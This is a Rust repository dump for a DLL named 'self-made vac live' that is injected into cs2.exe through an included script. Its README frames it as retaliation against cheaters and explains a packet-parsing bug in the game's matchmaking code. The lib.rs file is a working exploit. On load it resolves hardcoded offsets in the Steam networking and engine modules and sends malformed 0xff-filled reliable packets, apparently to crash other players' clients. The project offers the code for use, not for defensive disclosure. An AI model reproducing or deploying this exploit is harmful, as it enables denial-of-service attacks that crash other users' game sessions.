├── .gitignore
├── execute_vac_live.nu
├── Cargo.toml
├── README.md
├── src
    └── lib.rs
└── Cargo.lock


/.gitignore:
--------------------------------------------------------------------------------
1 | /target
2 | 


--------------------------------------------------------------------------------
/execute_vac_live.nu:
--------------------------------------------------------------------------------
1 | capylibary --process cs2.exe --lib "C:\\Windows\\System32\\agc_real.dll"


--------------------------------------------------------------------------------
/Cargo.toml:
--------------------------------------------------------------------------------
 1 | [package]
 2 | name = "agc_real"
 3 | version = "0.1.0"
 4 | edition = "2021"
 5 | 
 6 | [lib]
 7 | crate-type = ["cdylib"]
 8 | 
 9 | [dependencies]
10 | winsafe = { version = "0.0.22", features = ["kernel", "user"] }
11 | anyhow = "1.0"
12 | windows = { version = "0.58", features = [
13 |     "Win32_System_LibraryLoader",
14 |     "Win32_System_SystemServices",
15 | ] }
16 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # self-made vac live
 2 | 
 3 | ![logo](https://github.com/user-attachments/assets/61deecc0-65b3-4dce-a518-e0bf5a2959dd)
 4 | 
 5 | [![showcase](https://img.youtube.com/vi/xxv1jvq5Uxc/0.jpg)](https://www.youtube.com/watch?v=xxv1jvq5Uxc)
 6 | 
 7 | ## motivation
 8 | 
 9 | I want to have fun and play legit games with my friends, but it sometimes ends in hvl (cheat vs legit).
10 | 
11 | ## explanation
12 | 
13 | someone forgot to update matchmaking.dll? idk, it tries to get packet struct field twice (0x20) and it ends up reading bad data in `CConnectionlessLanMgr::UnpackPacket`
14 | ![](https://github.com/user-attachments/assets/62a92a00-a37c-4a0d-8e87-e65a0031a77a)
15 | ![](https://github.com/user-attachments/assets/30d32cc5-a798-45a7-83b5-f3df686ab203)
16 | ![](https://github.com/user-attachments/assets/53dc56fa-9922-4761-a0ac-5341042b1c6e)
17 | 


--------------------------------------------------------------------------------
/src/lib.rs:
--------------------------------------------------------------------------------
 1 | use anyhow::Context;
 2 | use std::mem;
 3 | use std::os::raw::c_void;
 4 | use windows::Win32::Foundation::HMODULE;
 5 | use windows::Win32::System::LibraryLoader::FreeLibraryAndExitThread;
 6 | use windows::Win32::System::SystemServices::DLL_PROCESS_ATTACH;
 7 | use winsafe::prelude::{kernel_Hinstance, Handle};
 8 | use winsafe::HINSTANCE;
 9 | 
10 | #[no_mangle]
11 | pub extern "system" fn DllMain(module: usize, reason: u32, _reserved: usize) -> i32 {
12 |     unsafe {
13 |         if reason == DLL_PROCESS_ATTACH {
14 |             crash().expect("failure");
15 |             std::thread::spawn(move || {
16 |                 FreeLibraryAndExitThread(HMODULE(module as _), 0);
17 |             });
18 |         }
19 |         1
20 |     }
21 | }
22 | 
23 | const RELIABLE_FLAG: i32 = 8;
24 | 
25 | unsafe fn crash() -> anyhow::Result<()> {
26 |     let steam_networking_sockets = HINSTANCE::GetModuleHandle(Some("steamnetworkingsockets.dll"))
27 |         .context("missing steamnetworkingsockets.dll")?;
28 |     let engine2 = HINSTANCE::GetModuleHandle(Some("engine2.dll")).context("missing engine2.dll")?;
29 |     let network_system = HINSTANCE::GetModuleHandle(Some("networksystem.dll"))
30 |         .context("missing networksystem.dll")?;
31 | 
32 |     let send_message_to_connection: extern "C" fn(
33 |         *mut c_void,
34 |         i32,
35 |         *const u8,
36 |         usize,
37 |         i32,
38 |         *mut c_void,
39 |     ) -> i32 = mem::transmute(steam_networking_sockets.ptr().byte_offset(0x8ee80));
40 | 
41 |     let net_interface = *(network_system.ptr().byte_offset(0x275d00) as *mut *mut c_void);
42 |     let conn_handle_part = *(engine2.ptr().byte_offset(0x5946b0) as *mut *mut c_void);
43 |     let conn_handle_part = *(conn_handle_part.byte_offset(0xb0) as *mut *mut c_void);
44 |     let conn_handle = *(conn_handle_part.byte_offset(0x38) as *mut i32);
45 | 
46 |     let mut packet_data = [0xffu8; 4096];
47 |     packet_data[4] = 0x00;
48 |     for i in 0..50 {
49 |         let packet_length = (i * 80).min(packet_data.len());
50 |         send_message_to_connection(
51 |             net_interface,
52 |             conn_handle,
53 |             packet_data.as_ptr(),
54 |             packet_length,
55 |             RELIABLE_FLAG,
56 |             std::ptr::null_mut(),
57 |         );
58 |     }
59 | 
60 |     Ok(())
61 | }
62 | 


--------------------------------------------------------------------------------
/Cargo.lock:
--------------------------------------------------------------------------------
  1 | # This file is automatically @generated by Cargo.
  2 | # It is not intended for manual editing.
  3 | version = 3
  4 | 
  5 | [[package]]
  6 | name = "agc_real"
  7 | version = "0.1.0"
  8 | dependencies = [
  9 |  "anyhow",
 10 |  "windows",
 11 |  "winsafe",
 12 | ]
 13 | 
 14 | [[package]]
 15 | name = "anyhow"
 16 | version = "1.0.94"
 17 | source = "registry+https://github.com/rust-lang/crates.io-index"
 18 | checksum = "c1fd03a028ef38ba2276dce7e33fcd6369c158a1bca17946c4b1b701891c1ff7"
 19 | 
 20 | [[package]]
 21 | name = "proc-macro2"
 22 | version = "1.0.92"
 23 | source = "registry+https://github.com/rust-lang/crates.io-index"
 24 | checksum = "37d3544b3f2748c54e147655edb5025752e2303145b5aefb3c3ea2c78b973bb0"
 25 | dependencies = [
 26 |  "unicode-ident",
 27 | ]
 28 | 
 29 | [[package]]
 30 | name = "quote"
 31 | version = "1.0.37"
 32 | source = "registry+https://github.com/rust-lang/crates.io-index"
 33 | checksum = "b5b9d34b8991d19d98081b46eacdd8eb58c6f2b201139f7c5f643cc155a633af"
 34 | dependencies = [
 35 |  "proc-macro2",
 36 | ]
 37 | 
 38 | [[package]]
 39 | name = "syn"
 40 | version = "2.0.90"
 41 | source = "registry+https://github.com/rust-lang/crates.io-index"
 42 | checksum = "919d3b74a5dd0ccd15aeb8f93e7006bd9e14c295087c9896a110f490752bcf31"
 43 | dependencies = [
 44 |  "proc-macro2",
 45 |  "quote",
 46 |  "unicode-ident",
 47 | ]
 48 | 
 49 | [[package]]
 50 | name = "unicode-ident"
 51 | version = "1.0.14"
 52 | source = "registry+https://github.com/rust-lang/crates.io-index"
 53 | checksum = "adb9e6ca4f869e1180728b7950e35922a7fc6397f7b641499e8f3ef06e50dc83"
 54 | 
 55 | [[package]]
 56 | name = "windows"
 57 | version = "0.58.0"
 58 | source = "registry+https://github.com/rust-lang/crates.io-index"
 59 | checksum = "dd04d41d93c4992d421894c18c8b43496aa748dd4c081bac0dc93eb0489272b6"
 60 | dependencies = [
 61 |  "windows-core",
 62 |  "windows-targets",
 63 | ]
 64 | 
 65 | [[package]]
 66 | name = "windows-core"
 67 | version = "0.58.0"
 68 | source = "registry+https://github.com/rust-lang/crates.io-index"
 69 | checksum = "6ba6d44ec8c2591c134257ce647b7ea6b20335bf6379a27dac5f1641fcf59f99"
 70 | dependencies = [
 71 |  "windows-implement",
 72 |  "windows-interface",
 73 |  "windows-result",
 74 |  "windows-strings",
 75 |  "windows-targets",
 76 | ]
 77 | 
 78 | [[package]]
 79 | name = "windows-implement"
 80 | version = "0.58.0"
 81 | source = "registry+https://github.com/rust-lang/crates.io-index"
 82 | checksum = "2bbd5b46c938e506ecbce286b6628a02171d56153ba733b6c741fc627ec9579b"
 83 | dependencies = [
 84 |  "proc-macro2",
 85 |  "quote",
 86 |  "syn",
 87 | ]
 88 | 
 89 | [[package]]
 90 | name = "windows-interface"
 91 | version = "0.58.0"
 92 | source = "registry+https://github.com/rust-lang/crates.io-index"
 93 | checksum = "053c4c462dc91d3b1504c6fe5a726dd15e216ba718e84a0e46a88fbe5ded3515"
 94 | dependencies = [
 95 |  "proc-macro2",
 96 |  "quote",
 97 |  "syn",
 98 | ]
 99 | 
100 | [[package]]
101 | name = "windows-result"
102 | version = "0.2.0"
103 | source = "registry+https://github.com/rust-lang/crates.io-index"
104 | checksum = "1d1043d8214f791817bab27572aaa8af63732e11bf84aa21a45a78d6c317ae0e"
105 | dependencies = [
106 |  "windows-targets",
107 | ]
108 | 
109 | [[package]]
110 | name = "windows-strings"
111 | version = "0.1.0"
112 | source = "registry+https://github.com/rust-lang/crates.io-index"
113 | checksum = "4cd9b125c486025df0eabcb585e62173c6c9eddcec5d117d3b6e8c30e2ee4d10"
114 | dependencies = [
115 |  "windows-result",
116 |  "windows-targets",
117 | ]
118 | 
119 | [[package]]
120 | name = "windows-targets"
121 | version = "0.52.6"
122 | source = "registry+https://github.com/rust-lang/crates.io-index"
123 | checksum = "9b724f72796e036ab90c1021d4780d4d3d648aca59e491e6b98e725b84e99973"
124 | dependencies = [
125 |  "windows_aarch64_gnullvm",
126 |  "windows_aarch64_msvc",
127 |  "windows_i686_gnu",
128 |  "windows_i686_gnullvm",
129 |  "windows_i686_msvc",
130 |  "windows_x86_64_gnu",
131 |  "windows_x86_64_gnullvm",
132 |  "windows_x86_64_msvc",
133 | ]
134 | 
135 | [[package]]
136 | name = "windows_aarch64_gnullvm"
137 | version = "0.52.6"
138 | source = "registry+https://github.com/rust-lang/crates.io-index"
139 | checksum = "32a4622180e7a0ec044bb555404c800bc9fd9ec262ec147edd5989ccd0c02cd3"
140 | 
141 | [[package]]
142 | name = "windows_aarch64_msvc"
143 | version = "0.52.6"
144 | source = "registry+https://github.com/rust-lang/crates.io-index"
145 | checksum = "09ec2a7bb152e2252b53fa7803150007879548bc709c039df7627cabbd05d469"
146 | 
147 | [[package]]
148 | name = "windows_i686_gnu"
149 | version = "0.52.6"
150 | source = "registry+https://github.com/rust-lang/crates.io-index"
151 | checksum = "8e9b5ad5ab802e97eb8e295ac6720e509ee4c243f69d781394014ebfe8bbfa0b"
152 | 
153 | [[package]]
154 | name = "windows_i686_gnullvm"
155 | version = "0.52.6"
156 | source = "registry+https://github.com/rust-lang/crates.io-index"
157 | checksum = "0eee52d38c090b3caa76c563b86c3a4bd71ef1a819287c19d586d7334ae8ed66"
158 | 
159 | [[package]]
160 | name = "windows_i686_msvc"
161 | version = "0.52.6"
162 | source = "registry+https://github.com/rust-lang/crates.io-index"
163 | checksum = "240948bc05c5e7c6dabba28bf89d89ffce3e303022809e73deaefe4f6ec56c66"
164 | 
165 | [[package]]
166 | name = "windows_x86_64_gnu"
167 | version = "0.52.6"
168 | source = "registry+https://github.com/rust-lang/crates.io-index"
169 | checksum = "147a5c80aabfbf0c7d901cb5895d1de30ef2907eb21fbbab29ca94c5b08b1a78"
170 | 
171 | [[package]]
172 | name = "windows_x86_64_gnullvm"
173 | version = "0.52.6"
174 | source = "registry+https://github.com/rust-lang/crates.io-index"
175 | checksum = "24d5b23dc417412679681396f2b49f3de8c1473deb516bd34410872eff51ed0d"
176 | 
177 | [[package]]
178 | name = "windows_x86_64_msvc"
179 | version = "0.52.6"
180 | source = "registry+https://github.com/rust-lang/crates.io-index"
181 | checksum = "589f6da84c646204747d1270a2a5661ea66ed1cced2631d546fdfb155959f9ec"
182 | 
183 | [[package]]
184 | name = "winsafe"
185 | version = "0.0.22"
186 | source = "registry+https://github.com/rust-lang/crates.io-index"
187 | checksum = "7d6ad6cbd9c6e5144971e326303f0e453b61d82e4f72067fccf23106bccd8437"
188 | 


--------------------------------------------------------------------------------